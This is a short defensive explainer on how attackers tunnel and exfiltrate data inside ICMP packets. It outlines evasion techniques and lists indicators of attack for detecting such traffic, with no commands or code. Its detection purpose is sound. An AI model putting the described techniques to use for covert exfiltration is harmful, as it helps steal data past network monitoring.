Data Exfil using ICMP

ICMP is a network-layer protocol used for diagnostics and control. Because it is commonly allowed through firewalls and typically inspected less strictly than TCP/UDP, attackers sometimes abuse ICMP to tunnel and exfiltrate data. Malicious actors encode data into ICMP payloads (echo request/reply, timestamp, info) and send it to a remote listener under their control.

Common techniques for exfil

• ICMP echo (type 8) / reply (type 0) tunneling: attackers place encoded (base64, hex) chunks of files inside ICMP payloads. The remote server collects and decodes them.

• Custom ICMP types/codes: using uncommon ICMP types or non-zero codes to avoid signature-based detections.

• Fragmentation and reassembly: large payloads are split across multiple packets.

• Encryption/obfuscation: Encrypting or obfuscating payloads (base64 is common) to look like random data.

IOAs

• Persistent ICMP sessions to an external host not used for legitimate monitoring.

• Unusually large ICMP payloads or frequent ICMP with payload > typical ping size.

• ICMP payloads that contain high-entropy data or patterns consistent with base64/hex.

• Bursts of ICMP are immediately followed by no other legitimate application traffic from the same host.